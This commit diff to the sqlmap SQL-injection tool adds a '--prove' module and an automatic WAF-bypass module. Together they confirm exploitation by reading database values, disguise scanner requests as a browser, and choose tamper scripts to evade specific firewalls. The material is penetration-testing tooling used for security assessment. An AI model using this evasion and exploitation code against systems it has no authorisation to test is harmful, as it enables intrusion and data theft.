Add --prove, opt-in --auto-tamper WAF bypass, and blindbinary/infoschema2innodb tampers

This commit is contained in:
Miroslav Štampar 2026-06-17 15:58:08 +02:00
parent a0cbfba9bd
commit 1404133538
16 changed files with 992 additions and 15 deletions

351
lib/utils/prove.py Normal file
View file

@ -0,0 +1,351 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import os
from lib.core.common import Backend
from lib.core.common import average
from lib.core.common import openFile
from lib.core.common import randomInt
from lib.core.common import stdev
from lib.core.common import unArrayizeValue
from lib.core.common import urldecode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import CHARSET_TYPE
from lib.core.enums import EXPECTED
from lib.core.enums import HTTPMETHOD
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.settings import INFERENCE_MARKER
from lib.core.settings import SLEEP_TIME_MARKER
from lib.request.inject import getValue
# how many times a true/false condition is re-evaluated to demonstrate repeatability (kills false positives)
PROVE_REPETITIONS = 5
# comparison knobs that decide true/false at request time (lib/request/comparison.py reads these globals,
# not injection.conf); they must be re-pointed at the injection being proven or the oracle returns None
_COMPARISON_ATTRS = ("string", "notString", "regexp", "code", "textOnly", "titles")
# width the field labels are padded to, so the values line up in a clean column
_LABEL_WIDTH = 9
def _field(label, value):
"""
Renders one 'Label: value' line (value column aligned), with any extra list items as continuation
lines indented under the value.
"""
lines = list(value) if isinstance(value, (list, tuple)) else [value]
indent = " " * (_LABEL_WIDTH + 2)
retVal = "%s:%s%s" % (label, " " * (_LABEL_WIDTH - len(label) + 1), lines[0] if lines else "")
for extra in lines[1:]:
retVal += "\n%s%s" % (indent, extra)
return retVal
def _activateInjection(injection):
"""
Points the global comparison configuration (and kb.injection) at the injection being proven, so the
boolean oracle / data retrieval use that injection's own distinguishing signal regardless of what the
globals drifted to during enumeration. Returns the previous state for restoration.
"""
saved = dict((_, getattr(conf, _)) for _ in _COMPARISON_ATTRS)
saved["injection"] = kb.injection
for attr in _COMPARISON_ATTRS:
setattr(conf, attr, getattr(injection.conf, attr, None))
kb.injection = injection
return saved
def _restoreInjection(saved):
kb.injection = saved.pop("injection")
for attr, value in saved.items():
setattr(conf, attr, value)
def _booleanOracle(expression):
"""
Evaluates a boolean expression strictly through the boolean (inferential) technique. UNION/error are
forced off on purpose: for a multi-technique injection getValue() would try those first, and a WAF/IPS
that blocks their function-heavy payloads makes them return None, which (with expectingNone) short-
circuits the whole call before the boolean technique is ever reached - the real cause of a 0/0 reading.
"""
return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=True, union=False, error=False, time=False)
def _signalArtifacts(expression):
"""
Evaluates 'expression' through the boolean oracle and reads back the (HTTP code, page <title>) of the
response it produced (queryPage stores both in thread data), so the boolean proof can quote the actual
TRUE/FALSE codes and titles rather than a generic flag. Returns (None, None) on any error.
"""
from lib.core.common import extractRegexResult, getCurrentThreadData
from lib.core.settings import HTML_TITLE_REGEX
try:
_booleanOracle(expression)
threadData = getCurrentThreadData()
return threadData.lastCode, (extractRegexResult(HTML_TITLE_REGEX, threadData.lastPage or "") or "").strip()
except Exception:
return None, None
def _proveBoolean(injection):
"""
Demonstrates deterministic boolean control, rendered with the distinguishing signal sqlmap already
auto-selected (--string / --code / --title), repeated to show it is stable (not a fluke). The signal
line quotes the actual distinguishing artifact: the matched string, the two HTTP codes, or the two
page titles - so a reader sees exactly what tells TRUE from FALSE.
"""
retVal = []
n = randomInt()
trues = sum(1 for _ in range(PROVE_REPETITIONS) if _booleanOracle("%d=%d" % (n, n)))
falses = sum(1 for _ in range(PROVE_REPETITIONS) if _booleanOracle("%d=%d" % (n, n + 1)) is False)
line = "condition %d=%d returns TRUE (%d/%d) while %d=%d returns FALSE (%d/%d)" % (n, n, trues, PROVE_REPETITIONS, n, n + 1, falses, PROVE_REPETITIONS)
if trues == PROVE_REPETITIONS and falses == PROVE_REPETITIONS:
line += ", repeatably" # only claim repeatability when every repetition agreed
retVal.append(line)
trueCode = trueTitle = falseCode = falseTitle = None
if injection.conf.code or injection.conf.titles: # fetch the real artifacts only when the signal needs them
trueCode, trueTitle = _signalArtifacts("%d=%d" % (n, n))
falseCode, falseTitle = _signalArtifacts("%d=%d" % (n, n + 1))
if injection.conf.string:
retVal.append("the response contains %s only when the condition is TRUE" % repr(injection.conf.string).lstrip('u'))
elif injection.conf.notString:
retVal.append("the response contains %s only when the condition is FALSE" % repr(injection.conf.notString).lstrip('u'))
elif injection.conf.code:
if trueCode and falseCode and trueCode != falseCode:
retVal.append("the response returns HTTP %s when the condition is TRUE and HTTP %s when it is FALSE" % (trueCode, falseCode))
else:
retVal.append("the response returns HTTP %s only when the condition is TRUE (a different code otherwise)" % injection.conf.code)
elif injection.conf.titles:
if trueTitle and falseTitle and trueTitle != falseTitle:
retVal.append("the page title is %s when the condition is TRUE and %s when it is FALSE" % (repr(trueTitle).lstrip('u'), repr(falseTitle).lstrip('u')))
else:
retVal.append("the page <title> differs between the TRUE and FALSE responses")
else:
retVal.append("the TRUE response matches the original page while the FALSE one differs (content similarity)")
return retVal
def _proveTime(injection):
"""
Demonstrates time-based blind in plain IT language (jitter / latency / controlled delay), keeping the
statistics under the hood. Where the payload uses a parameterizable delay (SLEEP(n)/pg_sleep(n)/WAITFOR),
it sweeps the injected delay (0 / T / 2T seconds) and shows the response time tracks it ~1:1 - a controlled
delay that network latency or a slow page cannot reproduce. Otherwise (heavy-query delays) it falls back to
a baseline-vs-jitter statement.
"""
from lib.core.agent import agent
from lib.core.common import getCurrentThreadData, popValue, pushValue
from lib.request.connect import Connect as Request
retVal = []
stype = PAYLOAD.TECHNIQUE.TIME if PAYLOAD.TECHNIQUE.TIME in injection.data else PAYLOAD.TECHNIQUE.STACKED
vector = (injection.data.get(stype) or {}).get("vector")
def _baselineStatement():
baseline = kb.responseTimes.get(kb.responseTimeMode) or []
if len(baseline) >= 2:
return "a TRUE condition delays the response well beyond the target's normal latency ~%.3fs (jitter ~%.3fs), repeatably" % (average(baseline), stdev(baseline))
return "a TRUE condition delays the response well beyond the target's normal latency and jitter, repeatably"
if not (vector and SLEEP_TIME_MARKER in vector):
retVal.append(_baselineStatement())
return retVal
n = randomInt()
base = conf.timeSec or 5
measurements = []
benign = []
for _ in range(3):
try:
Request.queryPage(timeBasedCompare=True, raise404=False, silent=True)
benign.append(getCurrentThreadData().lastQueryDuration)
except Exception:
pass
for k in (0, base, 2 * base):
pushValue(conf.timeSec)
conf.timeSec = k
try:
query = agent.suffixQuery(agent.prefixQuery(vector.replace(INFERENCE_MARKER, "%d=%d" % (n, n))))
Request.queryPage(agent.payload(newValue=query), timeBasedCompare=True, raise404=False, silent=True)
measurements.append((k, getCurrentThreadData().lastQueryDuration))
except Exception:
measurements.append((k, None))
finally:
conf.timeSec = popValue()
if any(d is None for _, d in measurements):
retVal.append(_baselineStatement())
return retVal
d0, dT, d2T = (measurements[0][1], measurements[1][1], measurements[2][1])
baseAvg = average(benign) if benign else d0
baseStd = stdev(benign) if len(benign) >= 2 else 0.0
# only claim 1:1 scaling if the measurements actually track the injected seconds: 0s stays near baseline,
# Ts ~ T, 2Ts ~ 2T, monotonic. A heavy-query delay (e.g. SQLite RANDOMBLOB) also rides [SLEEPTIME] but
# does NOT scale linearly, so it must NOT be rendered as 1:1 (its sweep is noisy / non-monotonic)
linear = d0 < max(0.5, base * 0.5) and abs(dT - base) <= base * 0.5 and abs(d2T - 2 * base) <= base * 0.6 and d2T > dT
if linear:
retVal.append("normal response ~%.3fs (jitter ~%.3fs); injected delay %s" % (baseAvg, baseStd, " ".join("%ds -> %.2fs" % (k, d) for k, d in measurements)))
retVal.append("the response slows ~1:1 with the injected delay - a controlled delay that network latency or a slow page cannot reproduce (the 0s case returns at normal speed)")
else:
retVal.append("a TRUE condition makes the response take ~%.2fs versus ~%.3fs normal (jitter ~%.3fs), repeatably" % (max(dT, d2T), baseAvg, baseStd))
retVal.append("a FALSE condition returns at normal speed - a sustained delay neither network latency nor a slow page reproduces")
return retVal
def _retrieveProof():
"""
Reads values back through the injection to prove it - DBMS-agnostic, weakest-to-strongest:
1. a random arithmetic product (e.g. 48391*60128): every SQL engine evaluates it, it needs no
table/function/FROM (valid even on Oracle), so its WAF surface is tiny - yet the operands are
random, so reading the exact product back proves the back-end actually executed injected SQL
(not a reflected constant);
2. the DBMS banner: a real datum the application never returns on its own (the strongest proof).
Whatever evasion the run already adopted (tamper scripts) applies here too - this is not tied to any one
DBMS or tamper. Returns a list of (label, text) rungs; both, one, or none may be present.
"""
from lib.request import inject
retVal = []
a, b = randomInt(4), randomInt(4) # 4-digit operands: product stays < 2^31 so it never overflows a 32-bit INT (e.g. PostgreSQL int4), yet is unguessable
try:
result = inject.getValue("%d*%d" % (a, b), expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS, resumeValue=False, suppressOutput=True)
except Exception:
result = None
if result is not None and ("%s" % result).strip() == str(a * b):
retVal.append(("Computed", "%d*%d = %d returned by the back-end - it executed the injected SQL (works on any DBMS)" % (a, b, a * b)))
label = value = None
for requested, candidate, lbl in ( # reuse a value the user's own switches already pulled
(conf.getBanner, getattr(kb.data, "banner", None), "back-end DBMS banner"),
(conf.getCurrentUser, getattr(kb.data, "currentUser", None), "current database user"),
(conf.getCurrentDb, getattr(kb.data, "currentDb", None), "current database"),
):
if requested and candidate:
label, value = lbl, unArrayizeValue(candidate)
break
if value is None:
dbms = Backend.getIdentifiedDbms()
banner = getattr(queries.get(dbms), "banner", None) if dbms else None
query = getattr(banner, "query", None) if banner else None
if query:
try:
value = unArrayizeValue(inject.getValue(query, safeCharEncode=False, suppressOutput=True))
label = "back-end DBMS banner"
except Exception:
value = None
if value:
retVal.append(("Retrieved", "%s %s - a real value read out of the back-end (the strongest proof)" % (label, repr(value).lstrip('u'))))
return retVal
def proveExploitation():
"""
Renders a report-grade, best-effort demonstration of exploitation for the confirmed injection point
(option '--prove'), in the same style as sqlmap's injection-point summary so it reads naturally: the
target URL and the confirmed injection point (parameter / type / title / payload), then the strongest
proof first - an actual value read out of the back-end (drilling from the plain read to a more evasive
one so a WAF/IPS does not stop it) - backed by a deterministic boolean differential (rendered with the
distinguishing --string/--code/--title signal) or a statistical time-based demonstration. Written both
to stdout and to '<output>/proof.txt'.
"""
if not kb.injections or not any(getattr(_, "place", None) for _ in kb.injections):
return
injection = kb.injection if getattr(kb.injection, "place", None) else kb.injections[0]
saved = _activateInjection(injection)
try:
if PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
stype = PAYLOAD.TECHNIQUE.BOOLEAN
proof = _proveBoolean(injection)
elif PAYLOAD.TECHNIQUE.TIME in injection.data or PAYLOAD.TECHNIQUE.STACKED in injection.data:
stype = PAYLOAD.TECHNIQUE.TIME if PAYLOAD.TECHNIQUE.TIME in injection.data else PAYLOAD.TECHNIQUE.STACKED
proof = _proveTime(injection)
elif PAYLOAD.TECHNIQUE.ERROR in injection.data:
stype = PAYLOAD.TECHNIQUE.ERROR
proof = ["the back-end error message returns the requested value directly"]
elif PAYLOAD.TECHNIQUE.UNION in injection.data:
stype = PAYLOAD.TECHNIQUE.UNION
proof = ["the requested value is rendered inside the application response"]
else:
stype = next(iter(injection.data), None)
proof = []
rungs = _retrieveProof()
finally:
_restoreInjection(saved)
from lib.core.agent import agent
target = conf.url or ""
if conf.parameters.get(PLACE.GET) and "?" not in target: # spell out the full GET target, not just the path
target += "?%s" % conf.parameters[PLACE.GET]
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else injection.place
sdata = injection.data.get(stype)
fields = [_field("Target", target)]
if conf.parameters.get(PLACE.POST):
fields.append(_field("Data", conf.parameters[PLACE.POST]))
fields.append(_field("Parameter", "%s (%s)" % (injection.parameter, paramType)))
if sdata is not None:
fields.append(_field("Technique", PAYLOAD.SQLINJECTION[stype]))
if sdata.payload:
payload = urldecode(agent.adjustLateValues(sdata.payload), unsafe="&", spaceplus=(injection.place != PLACE.GET and kb.postSpaceToPlus))
fields.append(_field("Payload", payload))
if proof:
fields.append(_field("Proof", proof))
if rungs:
for label, text in rungs:
fields.append(_field(label, text))
else:
fields.append(_field("Retrieved", "(no value could be read back; the proof above still confirms exploitation)"))
data = "\n".join(fields)
header = "sqlmap proved exploitation of the following injection point"
conf.dumper.string(header, data)
try:
path = os.path.join(conf.outputPath or ".", "proof.txt")
with openFile(path, "w+") as f:
f.write("%s:\n---\n%s\n---\n" % (header, data))
logger.info("proof of exploitation written to '%s'" % path)
except Exception:
pass

156
lib/utils/wafbypass.py Normal file
View file

@ -0,0 +1,156 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import base64
import json
import os
import struct
import sys
from lib.core.common import fetchRandomAgent
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import paths
from lib.core.enums import HTTP_HEADER
from lib.core.enums import PLACE
from lib.core.settings import WAF_BYPASS_HTTP_HEADERS
from lib.core.settings import WAF_BYPASS_TAMPERS
def neutralizeFingerprint():
"""
Makes the request look like a real browser (random non-scanner User-Agent from the canonical
'txt/user-agents.txt' - the same source as switch '--random-agent' - plus browser Accept/Accept-Language),
used by automatic WAF-bypass. The per-request User-Agent is sourced from conf.parameters[PLACE.USER_AGENT]
(queryPage passes it explicitly, overriding conf.agent), so that is the authoritative knob; conf.agent
and the HTTP header list are updated too. Returns the previous state so the change can be reverted.
"""
saved = (conf.agent, conf.httpHeaders, conf.parameters.get(PLACE.USER_AGENT))
userAgent = fetchRandomAgent()
conf.agent = userAgent
if PLACE.USER_AGENT in conf.parameters:
conf.parameters[PLACE.USER_AGENT] = userAgent
overrides = dict(((HTTP_HEADER.USER_AGENT, userAgent),) + tuple(WAF_BYPASS_HTTP_HEADERS))
upper = dict((_.upper(), _) for _ in overrides)
headers, seen = [], set()
for header, hvalue in conf.httpHeaders:
if header.upper() in upper:
headers.append((header, overrides[upper[header.upper()]]))
seen.add(header.upper())
else:
headers.append((header, hvalue))
for header, hvalue in overrides.items():
if header.upper() not in seen:
headers.append((header, hvalue))
conf.httpHeaders = headers
return saved
# identYwaf encodes each fingerprint as a packed array of 16-bit words, one per provocation
# vector, where the LOW bit marks whether that vector was blocked (lib/../identywaf/identYwaf.py:
# struct.pack(">H", (hash << 1) | blocked)). Decoding the bundled per-WAF signatures therefore
# yields, for free, which constructs a known WAF actually blocks - an empirical prior for picking
# bypass tampers. The two indices below (from data.json "payloads") are the ones we key decisions
# on: comment-obfuscated payloads (whether comment-insertion tampers stand any chance).
_IDENTYWAF_COMMENT_VECTORS = (2, 3, 13) # "1/**/AND/**/1", "1/*0AND*/1", "1/**/UNION/**/SELECT.../information_schema.*"
_DATA = None
def _data():
global _DATA
if _DATA is None:
path = os.path.join(paths.SQLMAP_ROOT_PATH, "thirdparty", "identywaf", "data.json")
with open(path, "rb") as f:
_DATA = json.loads(f.read().decode("utf-8"))
return _DATA
def identYwafBlockedVectors(wafName):
"""
Returns the set of provocation-vector indices that the given (identYwaf) WAF blocks, decoded
from its bundled blind signatures (majority vote across signature variants). Empty set if the
WAF/signatures are unknown.
>>> isinstance(identYwafBlockedVectors("cloudflare"), set)
True
"""
retVal = set()
wafs = _data().get("wafs", {})
info = wafs.get(wafName) or wafs.get((wafName or "").lower())
if not info:
return retVal
expected = len(_data().get("payloads", []))
counts, total = {}, 0
for signature in info.get("signatures", []):
try:
raw = base64.b64decode(signature.split(':', 1)[-1])
except Exception:
continue
words = struct.unpack(">%dH" % (len(raw) // 2), raw) if len(raw) >= 2 else ()
if len(words) != expected: # only consider signatures over the current vector set
continue
total += 1
for index, word in enumerate(words):
if word & 1:
counts[index] = counts.get(index, 0) + 1
if total:
retVal = set(index for index, c in counts.items() if c * 2 >= total) # blocked in a majority of variants
return retVal
def candidateTampers(identifiedWafs=None):
"""
Returns the ordered list of candidate tamper-script names for automatic WAF bypass: the
empirically-ranked WAF_BYPASS_TAMPERS, with comment-insertion camouflage pruned when the
identified WAF is known to block comment-obfuscated payloads (so requests aren't wasted on
tampers that can't help). Semantics (and DBMS compatibility) are verified at runtime by
re-running detection through each candidate, so no DBMS pre-filtering is needed here.
>>> "between" in candidateTampers()
True
>>> "equaltolike" in candidateTampers()
True
"""
retVal = list(WAF_BYPASS_TAMPERS)
blocked = set()
for waf in (identifiedWafs or []):
blocked |= identYwafBlockedVectors(waf)
if blocked and any(_ in blocked for _ in _IDENTYWAF_COMMENT_VECTORS):
retVal = [_ for _ in retVal if not _.startswith("space2") and _ != "versionedkeywords"]
return retVal
def loadTamper(name):
"""
Imports a tamper script by name from the tamper directory and returns its 'tamper' function
(or None if missing). Mirrors the loader in option._setTamperingFunctions, for runtime use.
"""
dirname = paths.SQLMAP_TAMPER_PATH
if dirname not in sys.path:
sys.path.insert(0, dirname)
module = __import__(str(name))
function = getattr(module, "tamper", None)
if function is not None:
function.__name__ = name
return function